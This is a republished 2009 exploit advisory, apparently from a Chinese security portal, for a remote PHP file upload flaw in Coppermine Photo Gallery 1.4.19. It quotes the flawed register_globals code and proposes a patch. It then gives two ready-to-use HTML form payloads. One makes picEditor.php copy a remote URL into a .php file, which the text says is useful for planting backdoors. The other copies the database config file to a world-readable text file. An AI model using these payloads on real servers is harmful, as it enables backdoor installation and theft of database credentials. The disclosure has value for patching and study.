首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Coppermine Photo Gallery 1.4.19 Remote PHP File Upload Vulnerability
来源:vfocus.net 作者:vfocus 发布时间:2009-02-02  
Written By Michael Brooks
Special thanks to str0ke!


Coppermine Photo gallery - Remote PHP File Upload
Affects: v1.4.19
Homepage: http://coppermine-gallery.net/
5,239,057   downloads from sf.net!

For this attack we need register_globals=on .  The problem is that
the anti-register_globals security can be bypassed.

This is in /include/init.inc.php  starting on line 42:
$keysToSkip = array('_POST', '_GET', '_COOKIE', '_REQUEST', '_SERVER', 'HTML_SUBST');
//...
        if (is_array($_POST)) {
                foreach ($_POST as $key => $value) {
                        if (!is_array($value))
                                $_POST[$key] = strtr($value, $HTML_SUBST);
                        if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
                }
        }

        if (is_array($_GET)) {
                foreach ($_GET as $key => $value) {
                        unset($_GET[$key]);
                        $_GET[strtr(stripslashes($key), $HTML_SUBST)] = strtr(stripslashes($value), $HTML_SUBST);
                        if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
                }
        }

        if (is_array($_COOKIE)) {
                foreach ($_COOKIE as $key => $value) {
                        if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
                }
        }
        if (is_array($_REQUEST)) {
                foreach ($_REQUEST as $key => $value) {
                        if (!is_array($value))
                                $_REQUEST[$key] = strtr($value, $HTML_SUBST);
                        if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
                }
        }
	//...
	
Here is a patch that will take care of register_globals.
if(ini_get(register_globals)){
	foreach(get_defined_vars() as $var=>$val){
		//only keep superglobals we need on this whitelist,  _SESSION will take care of its self:
		if(!in_array($var,array('_POST', '_GET', '_COOKIE', '_REQUEST', '_SERVER'))){
			unset($$var);
		}
	}
}


These 2 exploits are written in HTM,   but they are NOT XSRF!  This is
a global variable manipulation issue,  you can exploit this with CURL
or whatever.

This will copy www.google.com  to
http://127.0.0.1/cpg1419/albums/test.php .  This is very useful for
uploading backdoors.
This is hijacking  a call to copy() so we need allow_url_fopen=On ,
which is default.
<html>
	<form action="http://127.0.0.1/cpg1419/picEditor.php?img_dir=http%3A%2F%2Fwww.google.com&CURRENT_PIC[filename]=/test.php"
method=post>
		<input name="save" value=1>
		<input name="keysToSkip" value=1>
		<input name="_GET" value=1>
		<input name="_REQUEST" value=1>
		<input type=submit>
	</form>
</html>


This request will copy the database connection info and make it readable here:
http://10.1.1.155/Audit/cpg1419/albums/dbinfo.txt
This attack works with allow_url_fopen=Off
<html>
	<form action="http://127.0.0.1/cpg1419/picEditor.php?img_dir=include/config.inc.php&CURRENT_PIC[filename]=/dbinfo.txt"
method=post>
		<input name="save" value=1>
		<input name="keysToSkip" value=1>
		<input name="_GET" value=1>
		<input name="_REQUEST" value=1>
		<input type=submit>
	</form>
</html>

# [2009-01-29]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Star Articles 6.0 (admin.manag
·WOW - Web On Windows ActiveX C
·Star Articles 6.0 (add/edit/de
·GLPI v 0.71.3 Multiple Remote
·Amaya Web Editor <= 11.0 Remot
·Internet Explorer 7 ClickJacki
·Personal Site Manager <= 0.3 R
·WFTPD Explorer Pro 1.0 Remote
·Thomson mp3PRO Player/Encoder
·dBpowerAMP Audio Player v2 (.p
·Google Chrome 1.0.154.43 Click
·Motorola Wimax modem CPEi300 (
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved